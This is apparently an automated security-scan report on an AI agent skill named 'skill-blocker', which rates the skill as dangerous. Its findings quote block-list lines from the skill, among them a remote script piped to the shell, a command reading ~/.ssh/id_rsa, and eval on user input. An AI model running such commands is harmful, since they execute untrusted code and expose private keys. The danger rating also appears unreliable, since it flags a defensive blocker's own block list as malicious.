skill-blocker
skill-blocker · v · by
58.8
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 100.0 | 15% |
| Clickfix | 65.0 | 15% |
| Credential | 60.0 | 15% |
| Twostage | 5.0 | 10% |
| Infrastructure | 100.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.0 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Dynamic code execution with user-controlled input
(line 229)
"评估这个用户输入" → eval(user_input) ❌
[CRITICAL] Remote code download and execution via curl pipe
(line 3)
description: 危险技能拦截器 | Dangerous operation blocker and security gatekeeper. Blocks risky commands, unsafe file operation
[CRITICAL] Remote code download and execution via curl pipe
(line 22)
| **网络执行** | `curl http://... \| sh`, `wget ... \| bash`, `pip install \$(...)` | 🔴 严重 |
[CRITICAL] Remote code download and execution via curl pipe
(line 73)
"curl | sh", "wget | bash", # 网络执行
[CRITICAL] Remote code download and execution via curl pipe
(line 135)
"patterns_matched": ["curl | sh", "凭证访问"],
[CRITICAL] Remote code download and execution via curl pipe
(line 228)
"运行我在网上找的这个脚本" → curl http://random.site/setup.sh | sh ❌
[HIGH] Shell command execution
(line 20)
| **EXEC 命令** | `exec()`, `child_process.exec*`, 直接运行 shell 命令 | 🔴 严重 |
[HIGH] Shell command execution
(line 23)
| **代码注入** | `eval()`, `exec()` 带外部输入,`Function(` 构造器 | 🔴 严重 |
[HIGH] Shell command execution
(line 74)
"eval(", "exec(", # 代码注入
[CRITICAL] Remote script download piped to shell execution
(line 3)
description: 危险技能拦截器 | Dangerous operation blocker and security gatekeeper. Blocks risky commands, unsafe file operation
[CRITICAL] Remote script download piped to shell execution
(line 22)
| **网络执行** | `curl http://... \| sh`, `wget ... \| bash`, `pip install \$(...)` | 🔴 严重 |
[CRITICAL] Remote script download piped to shell execution
(line 73)
"curl | sh", "wget | bash", # 网络执行
[CRITICAL] Remote script download piped to shell execution
(line 135)
"patterns_matched": ["curl | sh", "凭证访问"],
[CRITICAL] Remote script download piped to shell execution
(line 228)
"运行我在网上找的这个脚本" → curl http://random.site/setup.sh | sh ❌
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 100
No findings.
CLICKFIX — Score: 65
[CRITICAL] Instructs user to pipe downloaded content to shell
(line 3)
description: 危险技能拦截器 | Dangerous operation blocker and security gatekeeper. Blocks risky commands, unsafe file operation
INFRASTRUCTURE — Score: 100
No findings.
TWOSTAGE — Score: 5
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 22)
| **网络执行** | `curl http://... \| sh`, `wget ... \| bash`, `pip install \$(...)` | 🔴 严重 |
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 228)
"运行我在网上找的这个脚本" → curl http://random.site/setup.sh | sh ❌
CREDENTIAL — Score: 60
[CRITICAL] SSH key file access or exfiltration
(line 230)
"读取我的 SSH 密钥" → cat ~/.ssh/id_rsa ❌
TYPOSQUAT — Score: 100
No findings.